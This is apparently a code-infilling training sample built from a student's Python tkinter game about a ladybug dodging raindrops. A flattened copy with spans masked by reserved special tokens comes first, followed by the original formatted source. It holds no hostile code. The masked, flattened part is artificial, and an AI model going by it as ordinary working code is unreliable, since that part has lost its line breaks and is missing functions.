canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick def checkLast(event, data): if data.last - data.r <= event.y <= data.last + data.r: if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r: data.powerUpsEditor = True data.yes, data.no = data.click, data.notClick if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r: data.powerUpsEditor = False data.no, data.yes = data.click, data.notClick if data.enter == data.click: if data.enterX - data.r <= event.y <= data.enterX + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'levelCreated' def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. rainSpeed != None): data.enter = data.click canvas.create_image(data.medX, data.enterX, image=data.enter) canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.S_P - 10, text= 'Edit Your Level!', font='Arial 23 bold', fill='yellow') drawButtons(canvas, data) drawHome(canvas, data) def setEverything(data): if data.yourSpeed == 'slow': data.speed = 6 elif data.yourSpeed == 'medium': data.speed = 10 elif data.yourSpeed == 'fast': data.speed = 14 if data.rainSpeed == 'thunderstorm': data.rSpeed = 7 elif data.rainSpeed == 'rain': data.rSpeed = 10 elif data.rainSpeed == 'drizzle': data.rSpeed = 13 <|reserved_special_token_0|> def levelPowerUp(data): if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time % 40 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 35 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives > 0: data.cy -= data.speed if data.cy < 15: data.level += 1 if data.cy > 40: data.time += 1 if data.pauseDrops != True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data. levelEditorLives, font='Arial 20 bold', fill='yellow') canvas.create_text(data.width / 2, 660, text= """You lose a life for hitting a drop & don't get eaten!""", font='Arial 15 bold', fill='yellow') if data.levelEditorLives <= 0: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def drawDifficulties(canvas, data): canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:', font='Arial 23 bold', fill='yellow') canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Easy') canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium') canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Hard') if data.difficulty != None: data.enter = data.click canvas.create_image(data.medX, data.enterY, image=data.enter) canvas.create_text(data.medX, data.enterY, text='Enter') def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): for scaryBug in data.scaryBug: if (data.player1Y - data.r - scaryBug.y <= distance and data. switchOnProgress == False): if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data .player1X + data.r): return True def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) def addExtraCoconut(data): if data.time % 18 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(755, 0)) if data.time % 37 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(550, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) def AIKeyPressed(event, data): if event.keysym == 'r': init(data) if data.winner == None: if event.keysym == 'Left' and data.onLeft1 == False: data.onLeft1 = True data.player2X = 550 elif event.keysym == 'Right' and data.onLeft1 == True: data.onLeft1 = False data.player2X = 750 def AIMousePressed(event, data): checkHome(event, data) def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def AIRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconutsAI1: coconut.draw(canvas) for coconut in data.coconutsAI2: coconut.draw(canvas) canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill ='yellow') drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) AIWinner(canvas, data) drawHome(canvas, data) def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') def helpKeyPressed(event, data): if event.keysym == 'r': init(data) <|reserved_special_token_0|> def helpTimerFired(data): difficultyTimerFired(data) def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> #Arushi Patel (aruship) from tkinter import * import random ###################################### #images taken from wikipedia,pixabay, #trans americas, clipartpanda,pngimg, #findicons, microsoft word ###################################### #################################### # init #################################### def init(data): data.score =0 data.mode = "splashScreen" data.timerDelay = 100 data.height = 800 data.width = 800 data.speed = 10 data.speedAI = 12 data.speedAI2 = 12 data.switchOnProgress = False data.r = 25 data.cx= 280 data.cy=750 data.onLeft1, data.onLeft2 = True, True data.win= False data.coconuts = [] data.powerUps = [] data.coconuts1 = [] data.coconuts2 = [] data.coconutsAI1 =[] data.coconutsAI2 = [] data.invincible = [] data.pauseDrops = False data.pause1Drop = False data.pause2Drop = False init1(data) def init1(data): data.beInvincible = False data.Invincible1 = False data.Invincible2 = False data.scaryBug = [] data.time = 0 data.coconutFall = False data.sides = ["r", "l"] data.level = 1 data.splashScreenTime = 0 data.splashScreenDrops = [] data.background= PhotoImage(file="tree.gif") data.deadScreen = PhotoImage(file = "deadBug.gif") data.ladyBug = PhotoImage(file = "lady.gif") data.winScreen= PhotoImage(file = "treeTop1.gif") data.winBug = PhotoImage(file = "littleBug.gif") data.halfBackground = PhotoImage(file = "halfTree.gif") data.umbrella = PhotoImage(file = "umbrella2.gif") data.spider = PhotoImage(file = "spider.gif") data.hourGlass = PhotoImage(file = "hourGlass.gif") data.splashScreen = PhotoImage(file = "splash.gif") init2(data) def init2(data): data.tbg= PhotoImage(file = "tbg2.gif") data.click = PhotoImage(file = "click.gif") data.notClick = PhotoImage(file = "notClick.gif") data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow= data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain =data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives =2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file = "home.gif") data.helpScreen = PhotoImage(file = "help1.gif") data.title = PhotoImage(file = "title.gif") data.scoreList = [] data.spotList = [270,364,458,552, 646, 740] data.savedScores = readFile("score.txt") if data.mode == "levelCreated": setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX= 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height/2-20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min= 270 data.Player1Max = 740 data.homeX =50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) def initScoreBoardHelp(data): data.tbgY=5*data.height/12 data.txtTScore = 150 data.S_P = 220 data.numScores = 5 data.scorePos = data.height/10 data.scoreShift = 270 data.helpY = data.height/2-20 data.name = "" data.printName = "" data.hit = False initAI(data) def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX =400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 #################################### # mode dispatcher #################################### def mousePressed(event, data): if (data.mode == "splashScreen"): splashScreenMousePressed(event, data) elif (data.mode == "1Player"): playerMousePressed(event, data) elif (data.mode == "2Player"): twoPlayerMousePressed(event, data) elif (data.mode == "editor"): editorMousePressed(event,data) elif (data.mode == "levelCreated"): levelCreatedMousePressed(event,data) elif (data.mode == "AI"): AIMousePressed(event, data) elif (data.mode == "difficulty"): difficultyMousePressed(event, data) elif (data.mode == "scoreboard"): scoreboardMousePressed(event, data) elif (data.mode == "help"): helpMousePressed(event, data) def keyPressed(event, data): if (data.mode == "splashScreen"): splashKeyPressed(event, data) elif (data.mode == "1Player"):playerKeyPressed(event, data) elif (data.mode == "2Player"):twoPlayerKeyPressed(event, data) elif (data.mode == "editor"): editorKeyPressed(event, data) elif (data.mode == "levelCreated"): levelCreatedKeyPressed(event,data) elif (data.mode == "AI"): AIKeyPressed(event, data) elif (data.mode == "difficulty"): difficultyKeyPressed(event, data) elif (data.mode == "scoreboard"): scoreboardKeyPressed(event, data) elif (data.mode == "help"): helpKeyPressed(event, data) def timerFired(data): if (data.mode == "splashScreen"): splashScreenTimerFired(data) elif (data.mode == "1Player"):playerTimerFired(data) elif (data.mode == "2Player"):twoPlayerTimerFired(data) elif (data.mode == "editor"): editorTimerFired(data) elif (data.mode == "levelCreated"): levelCreatedTimerFired(data) elif (data.mode == "AI"): AITimerFired(data) elif (data.mode == "difficulty"): difficultyTimerFired(data) elif (data.mode == "scoreboard"): scoreboardTimerFired(data) elif (data.mode == "help"): helpTimerFired(data) def redrawAll(canvas, data): if (data.mode == "splashScreen"): splashScreenRedrawAll(canvas, data) elif (data.mode == "1Player"):playerRedrawAll(canvas, data) elif (data.mode == "2Player"):twoPlayerRedrawAll(canvas, data) elif (data.mode == "editor"): editorRedrawAll(canvas, data) elif (data.mode == "levelCreated"): levelCreatedRedrawAll(canvas,data) elif (data.mode == "AI"): AIRedrawAll(canvas, data) elif (data.mode == "difficulty"): difficultyRedrawAll(canvas, data) elif (data.mode == "scoreboard"): scoreboardRedrawAll(canvas, data) elif (data.mode == "help"): helpRedrawAll(canvas, data) #################################### # splashScreen mode #################################### def splashScreenMousePressed(event, data): #checks for selection of mode if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r: if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r: data.mode = "1Player" if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r: data.mode = "2Player" if data.edButton-data.r<=event.y<=data.edButton+data.r: data.mode = "editor" if data.diffButton-data.r<=event.y<=data.diffButton+data.r: data.mode = "difficulty" if data.helpButton-data.r<=event.y<=data.helpButton+data.r: data.mode = "help" if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r: data.mode = "scoreboard" def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime %2 ==1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1) canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2) canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3) canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4) canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5) canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6) def rainDropSplash(data): xPosition = random.randint(0,800) data.splashScreenDrops.append(Coconuts(xPosition,0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width/2, data.splashText-10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.splashText, text=""" 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """, font="Arial 14 bold", fill = "yellow") splashScreenButtons(canvas, data) #################################### # taken from class notes #################################### def writeFile(path, contents): with open(path, "wt") as f: f.write(contents) def readFile(path): with open(path, "rt") as f: return f.read() #################################### # 1Player mode #################################### #Coconuts (from Mario game) represent the water drops class Coconuts(object): def __init__(self,x,y): self.x = x self.y = y self.r = 9 self.fill = "deep sky blue" self.speed = 30 self.outline= "blue" def draw(self, canvas): canvas.create_polygon(self.x,self.y- 2*self.r, self.x-self.r, self.y, self.x, self.y + self.r, self.x+self.r, self.y, fill = self.fill, outline = self.outline, width = 3) def onTimerFired(self, data): # downward falling motion self.y += self.speed def hit(data): #checks for hitting rain for coconut in data.coconuts: if data.mode == "1Player" or data.mode == "levelCreated": if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r: if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r: data.cy+=data.hitPenalty if data.mode == "levelCreated": data.lives-=1 elif data.hit ==False and data.level<data.levelMax: data.score -=data.level data.coconuts.remove(coconut) if data.mode == "levelCreated": data.levelEditorLives-=1 def hit2Player(data): if data.mode == "2Player": if data.Invincible1 == False: #only when powerup isn't active for coconut in data.coconuts1: if coconut.y>=data.player1Y-data.r \ and coconut.y<=data.player1Y+data.r: if coconut.x>=data.player1X-data.r and \ coconut.x<=data.player1X+data.r: data.player1Y+=data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: #only when powerup isn't active for coconut in data.coconuts2: if coconut.y>=data.player2Y-data.r and \ coconut.y<=data.player2Y+data.r: if coconut.x>=data.player2X-data.r and \ coconut.x<=data.player2X+data.r: data.player2Y+=data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self,x,y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): # checks if hits hour-glass & pauses with flag for powerUp in data.powerUps: if data.mode == "1Player" or data.mode == "levelCreated": if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r: if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r: data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == "2Player" or data.mode == "AI": if powerUp.y>=data.player1Y-data.r and \ powerUp.y<=data.player1Y+data.r: if powerUp.x>=data.player1X-data.r and \ powerUp.x<=data.player1X+data.r: data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if powerUp.y>=data.player2Y-data.r and \ powerUp.y<=data.player2Y+data.r: if powerUp.x>=data.player2X-data.r and \ powerUp.x<=data.player2X+data.r: data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self,x,y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): #checks if hits umbrella powerup for powerUp in data.invincible: if data.mode == "1Player" or data.mode == "levelCreated": if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r: if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r: data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == "2Player" or data.mode == "AI": #for player1 if powerUp.y>=data.player1Y-data.r and \ powerUp.y<=data.player1Y+data.r: if powerUp.x>=data.player1X-data.r and \ powerUp.x<=data.player1X+data.r: data.Invincible1=True data.start1 = data.player1Y data.invincible.remove(powerUp) # for player 2 if powerUp.y>=data.player2Y-data.r and \ powerUp.y<=data.player2Y+data.r: if powerUp.x>=data.player2X-data.r and \ powerUp.x<=data.player2X+data.r: data.Invincible2=True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self,x,y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode =="2Player" or data.mode == "AI": self.speed = 35 self.y -= self.speed if data.mode == "1Player" or data.mode == "levelCreated" and\ data.time %8 ==0: #makes spider dynamically move side = random.choice(data.sides) if side == "l": if self.x -data.lane >=data.Player1Min:self.x-=data.lane else: self.x+=data.lane elif side == "r": if self.x+data.lane<= data.Player1Max:self.x +=data.lane else: self.x -=data.lane def hitScaryBug(data): # checks for automatic death by spider for bug in data.scaryBug: if data.mode == "1Player" or data.mode == "levelCreated": if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r: if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r: data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == "2Player" or data.mode == "AI": if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r: if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r: data.winner= "player2" if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r: if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r: data.winner= "player1" def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): #home button in every screen canvas.create_image(data.homeX,data.homeY, image= data.home) def checkHome(event, data): if data.homeY-data.r<= event.y <= data.homeY +data.r: if data.homeX-data.r<= event.x<=data.homeX+ data.r: init(data) def coconutShot(data): if data.level >0 and data.pauseDrops == False: if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0: #increases drops as level increases xPosition1 = random.randint(0,data.Player1Min-data.buffer) xPosition2 = random.randint(data.Player1Max+data.buffer, data.width +data.buffer) data.coconuts.append(Coconuts(xPosition1,0)) data.coconuts.append(Coconuts(xPosition2,0)) xPosition4 = random.randint(data.Player1Min-data.buffer, data.Player1Max+data.buffer) 